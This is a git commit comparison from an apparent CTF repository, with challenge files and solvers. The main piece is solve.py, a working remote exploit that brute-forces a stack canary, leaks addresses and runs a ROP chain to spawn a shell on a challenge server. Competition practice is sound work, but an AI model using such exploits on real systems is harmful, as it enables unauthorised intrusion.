simon/CTF
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Compare commits

base: simon:e913fc7a39fc320574a2f07927bb7b826c86d202
Branches Tags
simon:main
...
compare: simon:main
Branches Tags
simon:main

16 Commits
e913fc7a39 ... main

Author SHA1 Message Date
Simon
87a0a1e801 crypto bros 2023-11-25 08:23:22 +01:00
Simon
1cf886812a forensics n shit 2023-11-25 08:13:31 +01:00
Simon
63e02524d1 quants 2023-11-25 08:11:57 +01:00
Simon
d41bb6e734 updates 2023-11-25 07:59:12 +01:00
Simon
0eb80f8965 rev pwn 2023-11-24 22:18:10 +01:00
Simon
43943fc1ea updates 2023-11-24 22:02:18 +01:00
Simon
b67983d10c updates 2023-11-24 20:40:00 +01:00
Simon
2a136311d0 crypto 2023-11-24 18:19:13 +01:00
Simon
41031cc6f8 Create qr.jpg 2023-11-24 17:55:55 +01:00
Simon
eaec057bb1 laokoon 2023-11-24 17:54:35 +01:00
sven
adf3a00bd7 Forensic Chal 2023-10-28 13:54:03 +02:00
sven
bd9db0f417 Folder structure plan in README 2023-10-28 10:39:23 +02:00
sven
329e16d36a Haxorcist Folder created 2023-10-28 10:34:37 +02:00
simon
f1e05160b5 Merge branch 'main' of https://git.spacemoehre.de/simon/CTF into main 2023-09-13 13:05:56 +02:00
simon
0bff0ba313 web server woes solved 2023-09-13 13:03:46 +02:00
simon
17e4bddf72 angr solved 2023-09-12 12:38:38 +02:00
215 changed files with 7701 additions and 7 deletions
Expand all files Collapse all files

2
.gitignore vendored
View File

@@ -2,3 +2,5 @@ ghidra*
hydra.restore
.idea
core
.gdb_history
*.rzdb

1
Blockharbor/pwn/Web Server Woes/flag.txt Normal file
View File

@@ -0,0 +1 @@
FLAG

125
Blockharbor/pwn/Web Server Woes/solve.py Normal file
View File

@@ -0,0 +1,125 @@
import time
from pwn import *
from subprocess import check_output
def get_pid(name):
return int(check_output(["pidof",name]))
context.log_level = "warn"
HOST = "celsius.blockharbor.io"
PORT = 55132
elf = ELF(os.getcwd() + "/web")
gs = '''
unset env LINES
unset env COLUMNS
set follow-fork-mode child
br *handle_conn+631
# br *main+420
continue
'''
def start():
if args.GDB:
return gdb.debug([elf.path], gs)
else:
return process([elf.path])
# io = start()
# io.recvuntil(b'Web Server listening on PORT\n')
sender = remote(HOST, PORT)
can_bytes = []
for j in range(16):
i = 0
while True:
# time.sleep(0.2)
# io.timeout(0.1)
print(i,j,can_bytes)
payload = b"GET /" + b" HTTP/1.1" + cyclic(1018) + b"".join([p8(x) for x in can_bytes]) + i.to_bytes()
try:
sender.send(payload)
ret = sender.recvuntil(b"Not found!\n")
can_bytes.append(i)
# print(i)
break
except:
i += 1
i %= 0x100
sender.close()
sender = remote(HOST, PORT)
continue
base_ptr = can_bytes[-8:]
base_ptr.reverse()
base_ptr = int("".join(["{:02x}".format(x) for x in base_ptr]), 16)
canary = can_bytes[:8]
canary.reverse()
canary = int("".join(["{:02x}".format(x) for x in canary]), 16)
sender.close()
rev_can_bytes = can_bytes.copy()
rev_can_bytes.reverse()
print(can_bytes, " ".join([hex(x)[2:] for x in rev_can_bytes]))
sender = remote(HOST, PORT)
print(p64(base_ptr), hex(base_ptr))
print(p64(canary), hex(canary))
# payload = b"GET /" + b" HTTP/1.1" + cyclic(1018) + b"".join([p8(x) for x in can_bytes]) + p8(0xb4) #+ b"AAAAAAAA" #+ cyclic(cyclic_find('caaa'))
payload = b"GET / HTTP/1.1"
payload += b"AAAAAAAA"
payload += p64(4) # sock_fd
payload += p64(base_ptr-0x41a-0x80) # ptr to write (-0x41a-0x80) points to somewhere in stack to leak a lot libc
payload += cyclic(1032-len(payload))
payload += p64(canary) + p64(base_ptr-0x41a) + p8(0xa9) # 0x41a offset to directly after HTTP/1.1 with $rbp-0x30
sender.send(payload)
leak = sender.recvall(timeout=2)
# ret = sender.recvuntil(b"Not found!\n")
# print(ret)
libc_heap_base = int.from_bytes(leak[10:18][::-1])-0xce0
http404str = int.from_bytes(leak[18:26][::-1])
rodata_base = int.from_bytes(leak[18:26][::-1])-0x30
code_base = rodata_base-0x1000
sender.close()
# gdb.attach(get_pid("./web"), gs)
sender = remote(HOST, PORT)
syscall = code_base + 0x00000000000041c
pop_rax = code_base + 0x00000000000045c
pop_rdi = code_base + 0x000000000000983
pop_rsi_r15 = code_base + 0x00000000981
pop_rdx = code_base + 0x000000000000414
pop_rsp = code_base + 0x97d
payload = b"GET /bin/sh\x00HTTP/1.1"
payload += cyclic(cyclic_find('aava')) # padding to rop chain
payload += p64(0)*3 # pop rsi also pops r13-15
#dup2(0,4)
payload += p64(pop_rax) + p64(33)
payload += p64(pop_rdi) + p64(4)
payload += p64(pop_rsi_r15) + p64(0) + p64(0)
payload += p64(syscall)
#dup2(1,4)
payload += p64(pop_rax) + p64(33)
payload += p64(pop_rdi) + p64(4)
payload += p64(pop_rsi_r15) + p64(1) + p64(0)
payload += p64(syscall)
# system(/bin/sh)
payload += p64(pop_rax) + p64(59)
payload += p64(pop_rdi) + p64(base_ptr-1116)
payload += p64(pop_rsi_r15) + p64(0) + p64(0)
payload += p64(pop_rdx) + p64(0)
payload += p64(syscall)
payload += cyclic(1032-len(payload)) # padding to end of buf
payload += p64(canary) + p64(base_ptr)
payload += p64(pop_rsp) + p64(base_ptr-1018)
sender.send(payload)
sender.interactive()
# ret = sender.recvall(timeout=2)
# print(ret)
pass

BIN
Blockharbor/pwn/Web Server Woes/web Executable file
View File

Binary file not shown.

37
Blockharbor/rev/Reversing #1/angr_solve.py Normal file
View File

@@ -0,0 +1,37 @@
import angr
import claripy
import logging
from pwn import *
logging.getLogger('angr').setLevel('DEBUG')
base = 0x00100000
input_len = 32
success = 0x001014a8
fail = 0x0010150b
proj = angr.Project("/home/simon/CTF/Blockharbor/rev/Reversing #1/chal", main_opts = {"base_addr": base})
flag_chars = [ claripy.BVS(f"flag_char{i}", 8) for i in range(input_len)]
flag = claripy.Concat( *flag_chars )
state = proj.factory.entry_state(args=["./chal"], remove_options={angr.options.LAZY_SOLVES}, stdin=flag)
for k in flag_chars:
state.solver.add(k >= 0x00)
state.solver.add(k <= 0xff)
simgr = proj.factory.simulation_manager(state)
simgr.explore(find=success)
if len(simgr.found) > 0:
for found in simgr.found:
print(found.posix.dumps(0))
io = process("./chal")
io.send(found.posix.dumps(0))
print(io.recvall())
else:
print(simgr)

BIN
Blockharbor/rev/Reversing #1/a.out → Blockharbor/rev/Reversing #1/chal
View File

Binary file not shown.

16
Blockharbor/rev/Reversing #1/mod_source.c
View File

@@ -28,7 +28,7 @@ void setup() {
}
int check_pass(unsigned int start[]) {
printf("checking\n");
//printf("checking\n");
unsigned int temp = 0;
for (int i = 0; i < 4; ++i) {
temp = start[i];
@@ -50,24 +50,26 @@ void main(){
memset(start, 0, 16);
read(0, user_input, MAX_SIZE);
//printf("%X ",user_input);
//printf("\n");
for (int i = 0; i < 4; i++) {
start[i] |= ((unsigned int)user_input[(i * 4)] << 24);
start[i] |= ((unsigned int)user_input[(i * 4)+1] << 16);
start[i] |= ((unsigned int)user_input[(i * 4)+2] << 8);
start[i] |= ((unsigned int)user_input[(i * 4)+3] << 0);
printf("%X ",start[i]);
//printf("%X ",start[i]);
}
printf("\n");
//printf("\n");
if (check_pass(start) == 1) {
printf("Thats it!\r\nSubmit in the format FLAG{");
//printf("Thats it!\r\nSubmit in the format FLAG{");
for (int i = 0; i < 4; i++) {
printf("%X",start[i]);
//printf("%X",start[i]);
}
printf("}\n");
//printf("}\n");
}
// Failed, just spin

BIN
LaokoonHaxorcist/Forensics/First Attempt/_key.docm.extracted/0.zip Normal file
View File

Binary file not shown.

2
LaokoonHaxorcist/Forensics/First Attempt/_key.docm.extracted/[Content_Types].xml Normal file
View File

@@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="bin" ContentType="application/vnd.ms-office.vbaProject"/><Default Extension="png" ContentType="image/png"/><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="xml" ContentType="application/xml"/><Override PartName="/word/document.xml" ContentType="application/vnd.ms-word.document.macroEnabled.main+xml"/><Override PartName="/word/vbaData.xml" ContentType="application/vnd.ms-word.vbaData+xml"/><Override PartName="/word/styles.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.styles+xml"/><Override PartName="/word/settings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml"/><Override PartName="/word/webSettings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.webSettings+xml"/><Override PartName="/word/fontTable.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.fontTable+xml"/><Override PartName="/word/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/><Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/><Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/></Types>

2
LaokoonHaxorcist/Forensics/First Attempt/_key.docm.extracted/_rels/.rels Normal file
View File

@@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/></Relationships>

2
LaokoonHaxorcist/Forensics/First Attempt/_key.docm.extracted/docProps/app.xml Normal file
View File

@@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"><Template>Normal.dotm</Template><TotalTime>0</TotalTime><Pages>1</Pages><Words>0</Words><Characters>1</Characters><Application>Microsoft Office Word</Application><DocSecurity>0</DocSecurity><Lines>1</Lines><Paragraphs>1</Paragraphs><ScaleCrop>false</ScaleCrop><Company></Company><LinksUpToDate>false</LinksUpToDate><CharactersWithSpaces>1</CharactersWithSpaces><SharedDoc>false</SharedDoc><HyperlinksChanged>false</HyperlinksChanged><AppVersion>16.0000</AppVersion></Properties>

2
LaokoonHaxorcist/Forensics/First Attempt/_key.docm.extracted/docProps/core.xml Normal file
View File

@@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><dc:title></dc:title><dc:subject></dc:subject><dc:creator></dc:creator><cp:keywords></cp:keywords><dc:description></dc:description><cp:lastModifiedBy></cp:lastModifiedBy><cp:revision>1</cp:revision><dcterms:created xsi:type="dcterms:W3CDTF">2023-02-15T10:19:00Z</dcterms:created><dcterms:modified xsi:type="dcterms:W3CDTF">2023-02-15T10:20:00Z</dcterms:modified></cp:coreProperties>

2
LaokoonHaxorcist/Forensics/First Attempt/_key.docm.extracted/word/_rels/document.xml.rels Normal file
View File

@@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId1" Type="http://schemas.microsoft.com/office/2006/relationships/vbaProject" Target="vbaProject.bin"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/></Relationships>

2
LaokoonHaxorcist/Forensics/First Attempt/_key.docm.extracted/word/_rels/vbaProject.bin.rels Normal file
View File

@@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.microsoft.com/office/2006/relationships/wordVbaData" Target="vbaData.xml"/></Relationships>

2
LaokoonHaxorcist/Forensics/First Attempt/_key.docm.extracted/word/document.xml Normal file
View File

@@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14"><w:body><w:p w14:paraId="630F0879" w14:textId="757E79E4" w:rsidR="00B4781B" w:rsidRDefault="00F40BEA"><w:r><w:rPr><w:noProof/></w:rPr><w:drawing><wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="10171FE2" wp14:editId="64332C01"><wp:simplePos x="0" y="0"/><wp:positionH relativeFrom="page"><wp:align>left</wp:align></wp:positionH><wp:positionV relativeFrom="paragraph"><wp:posOffset>-875665</wp:posOffset></wp:positionV><wp:extent cx="7934325" cy="11223407"/><wp:effectExtent l="0" t="0" r="0" b="0"/><wp:wrapNone/><wp:docPr id="1" name="Picture 1" descr="Graphical user interface, text&#xA;&#xA;Description automatically generated"/><wp:cNvGraphicFramePr><a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/></wp:cNvGraphicFramePr><a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"><a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture"><pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture"><pic:nvPicPr><pic:cNvPr id="1" name="Picture 1" descr="Graphical user interface, text&#xA;&#xA;Description automatically generated"/><pic:cNvPicPr/></pic:nvPicPr><pic:blipFill><a:blip r:embed="rId5" cstate="print"><a:extLst><a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}"><a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/></a:ext></a:extLst></a:blip><a:stretch><a:fillRect/></a:stretch></pic:blipFill><pic:spPr><a:xfrm><a:off x="0" y="0"/><a:ext cx="7934325" cy="11223407"/></a:xfrm><a:prstGeom prst="rect"><a:avLst/></a:prstGeom></pic:spPr></pic:pic></a:graphicData></a:graphic><wp14:sizeRelH relativeFrom="margin"><wp14:pctWidth>0</wp14:pctWidth></wp14:sizeRelH><wp14:sizeRelV relativeFrom="margin"><wp14:pctHeight>0</wp14:pctHeight></wp14:sizeRelV></wp:anchor></w:drawing></w:r></w:p><w:sectPr w:rsidR="00B4781B"><w:pgSz w:w="12240" w:h="15840"/><w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/><w:cols w:space="720"/><w:docGrid w:linePitch="360"/></w:sectPr></w:body></w:document>

2
LaokoonHaxorcist/Forensics/First Attempt/_key.docm.extracted/word/fontTable.xml Normal file
View File

@@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:fonts xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh"><w:font w:name="Calibri"><w:panose1 w:val="020F0502020204030204"/><w:charset w:val="00"/><w:family w:val="swiss"/><w:pitch w:val="variable"/><w:sig w:usb0="E4002EFF" w:usb1="C000247B" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/></w:font><w:font w:name="Times New Roman"><w:panose1 w:val="02020603050405020304"/><w:charset w:val="00"/><w:family w:val="roman"/><w:pitch w:val="variable"/><w:sig w:usb0="E0002EFF" w:usb1="C000785B" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/></w:font><w:font w:name="Calibri Light"><w:panose1 w:val="020F0302020204030204"/><w:charset w:val="00"/><w:family w:val="swiss"/><w:pitch w:val="variable"/><w:sig w:usb0="E4002EFF" w:usb1="C000247B" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/></w:font></w:fonts>

BIN
LaokoonHaxorcist/Forensics/First Attempt/_key.docm.extracted/word/media/image1.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 503 KiB

2
LaokoonHaxorcist/Forensics/First Attempt/_key.docm.extracted/word/settings.xml Normal file
View File

@@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:settings xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:sl="http://schemas.openxmlformats.org/schemaLibrary/2006/main" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh"><w:zoom w:percent="100"/><w:removePersonalInformation/><w:removeDateAndTime/><w:proofState w:spelling="clean" w:grammar="clean"/><w:defaultTabStop w:val="720"/><w:characterSpacingControl w:val="doNotCompress"/><w:compat><w:compatSetting w:name="compatibilityMode" w:uri="http://schemas.microsoft.com/office/word" w:val="15"/><w:compatSetting w:name="overrideTableStyleFontSizeAndJustification" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/><w:compatSetting w:name="enableOpenTypeFeatures" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/><w:compatSetting w:name="doNotFlipMirrorIndents" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/><w:compatSetting w:name="differentiateMultirowTableHeaders" w:uri="http://schemas.microsoft.com/office/word" w:val="1"/><w:compatSetting w:name="useWord2013TrackBottomHyphenation" w:uri="http://schemas.microsoft.com/office/word" w:val="0"/></w:compat><w:rsids><w:rsidRoot w:val="00094740"/><w:rsid w:val="00094740"/><w:rsid w:val="00B4781B"/><w:rsid w:val="00F40BEA"/></w:rsids><m:mathPr><m:mathFont m:val="Cambria Math"/><m:brkBin m:val="before"/><m:brkBinSub m:val="--"/><m:smallFrac m:val="0"/><m:dispDef/><m:lMargin m:val="0"/><m:rMargin m:val="0"/><m:defJc m:val="centerGroup"/><m:wrapIndent m:val="1440"/><m:intLim m:val="subSup"/><m:naryLim m:val="undOvr"/></m:mathPr><w:themeFontLang w:val="en-US"/><w:clrSchemeMapping w:bg1="light1" w:t1="dark1" w:bg2="light2" w:t2="dark2" w:accent1="accent1" w:accent2="accent2" w:accent3="accent3" w:accent4="accent4" w:accent5="accent5" w:accent6="accent6" w:hyperlink="hyperlink" w:followedHyperlink="followedHyperlink"/><w:shapeDefaults><o:shapedefaults v:ext="edit" spidmax="1026"/><o:shapelayout v:ext="edit"><o:idmap v:ext="edit" data="1"/></o:shapelayout></w:shapeDefaults><w:decimalSymbol w:val="."/><w:listSeparator w:val=","/><w14:docId w14:val="682FC616"/><w15:chartTrackingRefBased/></w:settings>

2
LaokoonHaxorcist/Forensics/First Attempt/_key.docm.extracted/word/styles.xml Normal file
View File

File diff suppressed because one or more lines are too long

2
LaokoonHaxorcist/Forensics/First Attempt/_key.docm.extracted/word/theme/theme1.xml Normal file
View File

File diff suppressed because one or more lines are too long

2
LaokoonHaxorcist/Forensics/First Attempt/_key.docm.extracted/word/vbaData.xml Normal file
View File

@@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<wne:vbaSuppData xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14"><wne:mcds><wne:mcd wne:macroName="PROJECT.THISDOCUMENT.RUNPOWERSHELL" wne:name="Project.ThisDocument.RunPowershell" wne:bEncrypt="00" wne:cmg="56"/><wne:mcd wne:macroName="PROJECT.THISDOCUMENT.AUTOOPEN" wne:name="Project.ThisDocument.AutoOpen" wne:bEncrypt="00" wne:cmg="56"/></wne:mcds></wne:vbaSuppData>

BIN
LaokoonHaxorcist/Forensics/First Attempt/_key.docm.extracted/word/vbaProject.bin Normal file
View File

Binary file not shown.

2
LaokoonHaxorcist/Forensics/First Attempt/_key.docm.extracted/word/webSettings.xml Normal file
View File

@@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:webSettings xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh"><w:optimizeForBrowser/><w:allowPNG/></w:webSettings>

BIN
LaokoonHaxorcist/Forensics/First Attempt/key.docm Normal file
View File

Binary file not shown.

BIN
LaokoonHaxorcist/Forensics/Infected/clients_information.xlsx.enc Normal file
View File

Binary file not shown.

BIN
LaokoonHaxorcist/Forensics/Infected/forensics_infected.zip Normal file
View File

Binary file not shown.

BIN
LaokoonHaxorcist/Forensics/Infected/mem.dmp Normal file
View File

Binary file not shown.

2
LaokoonHaxorcist/Forensics/Receipt/[Content_Types].xml Normal file
View File

@@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="bin" ContentType="application/vnd.ms-office.vbaProject"/><Default Extension="png" ContentType="image/png"/><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="xml" ContentType="application/xml"/><Override PartName="/word/document.xml" ContentType="application/vnd.ms-word.document.macroEnabled.main+xml"/><Override PartName="/word/vbaData.xml" ContentType="application/vnd.ms-word.vbaData+xml"/><Override PartName="/word/styles.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.styles+xml"/><Override PartName="/word/settings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml"/><Override PartName="/word/webSettings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.webSettings+xml"/><Override PartName="/word/fontTable.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.fontTable+xml"/><Override PartName="/word/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/><Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/><Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/></Types>

2
LaokoonHaxorcist/Forensics/Receipt/_rels/.rels Normal file
View File

@@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
